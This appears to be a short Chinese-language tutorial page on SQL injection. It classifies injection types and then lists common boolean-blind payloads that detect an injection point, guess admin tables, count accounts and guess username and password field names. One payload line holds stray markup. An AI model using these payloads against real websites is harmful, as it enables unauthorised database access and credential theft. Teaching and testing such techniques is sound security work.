sql注入語句

sql注入語句是怎樣的呢？下面就讓我們一起來了解一下吧：

sql注入語句其實可以分爲三種的，即數字型注入點，語句一般是“select * from表名where id=1 and 1=1”；字符型注入點，語句一般是“select * from表名where name...”；搜索型注入點。

而sql注入也就是通過將SQL命令插入到Web表單提交或是輸入域名、頁面請求的查詢字符串，最終可以達到欺騙服務器執行惡意的SQL命令。

sql注入類型通常是可以按照不同方式進行分類的，比如若是按照注入點類型來進行分類可以分爲數字型注入點、字符型注入點、搜索型注入點，若是按照數據提交的方式來分類，可以分爲GET 注入、POST 注入、Cookie 注入、HTTP 頭部注入。

當然也可以按照執行效果來分類，可以分爲基於布爾的盲注、基於時間的盲注、基於報錯注入、聯合查詢注入。

其中常用的語句有：

1、判斷有無注入點

; and 1=1 and 1=2

2、猜表 通常表的名稱基本上是admin adminuser user pass password 等..

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) ---判斷是否存在admin這張表

3、猜帳號數目 若是遇到0< 返回正確頁面 1<返回錯誤頁面那麼就說明帳號數目就是1個

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

4、猜解字段名稱 在len（）括號裏面可以加上所想到的字段名稱。

and 1=(select count(*) from admin where len(*)>0)--

and 1=(select count(*) from admin where len(用戶字段名稱name)>0)

and 1=(select count(*) from admin where len(_blank>密碼字段名稱password)>0)